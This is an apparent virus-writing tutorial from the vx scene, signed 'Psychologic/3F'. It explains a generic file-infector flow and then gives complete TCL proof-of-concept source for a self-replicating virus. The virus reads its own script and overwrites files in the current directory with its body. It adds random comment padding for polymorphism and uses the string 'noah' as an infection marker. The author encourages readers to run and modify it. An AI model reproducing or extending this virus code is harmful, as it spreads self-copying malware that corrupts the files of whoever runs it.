TCL virus.. 

.Author Notes

Viruses are lame thing,  it won't give you any benefit in your real life
everybody hates virus. So don't code virus if you don't have something new
in it. It just wasting your time, and your time can be converted to money

.About TCL

TCL (Tool Command Language) is a dynamic programming/scripting language
based on concepts of Lisp, C, and Unix shells. It can be used interactively, 
or by running scripts (programs) which can use a package system for structuring, 
hence allowing to do much with little code. Tcl is available for Linux, Windows,
Mac OS X, as well as other platforms, as open-source software under BSD-like
license, or as pre-built binaries.

.Can we write virus in TCL ?

Ofcourse yes, 100% competible to code TCL virus 

.How ?

Before you ask me how, you should know this standard procedure virus flow chart :

1. Virus read its own entrypoint (body)
2. Virus search the victim, will not infect if already marked
3. Virus open the victim and drop its body to the victim
4. Virus give a mark to the victim and close the victim
5. Virus loop to search another victim
6. Go to step 2 till there is no victim

I don't have much time to code another tcl function, so I just copy-paste from noah
just install activestate tcl community version and run the code

here the proof of concept code
------------------------------------------------------------------------code cut

set noah [open $argv0]
set vir [read $noah]
close $noah
set files {}
proc randstr {length {chars "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz~!@#$%^&*()_+`1234567890-="}} {
    set range [expr {[string length $chars]-1}]

    set txt ""
    for {set i 0} {$i < $length} {incr i} {
       set pos [expr {int(rand()*$range)}]
       append txt [string range $chars $pos $pos]
    }
    return $txt
 }

   switch $::tcl_platform(platform) {
      windows {
         set ext .tcl
      }
      unix {
         set ext .tcl
      }
      java {
         set ext .tcl
      }
      macintosh {
         set ext .tcl
      }
   }
   foreach file [glob -nocomplain -directory "" *.*] {
      set objectFile [file tail [file rootname $file]]$ext
      if {[file exists $objectFile]} {
	
		
	set s [open $file r]
	set victim [read $s]
	close $s
	if {[string match "*noah*" $victim]} {continue}

	set p [expr {int(rand()*30)}]
	set po [randstr $p]
	set poly "#$po"
	set f [open $file w+]

	set e [expr {int(rand()*2)}]
	if {$e == 1} { 
	puts $f "$victim \n $poly \n $vir \n $poly" 
	continue }
	puts $f "$poly \n $vir \n $poly \n $victim \n $poly \n"
      }
   }
   return $files
----------------------------------------------------------------------code cut

Lot of cool thing can be done by tcl virus, just try to modify my code,and mail me if you
have a problem with the code

.Psychologic/3F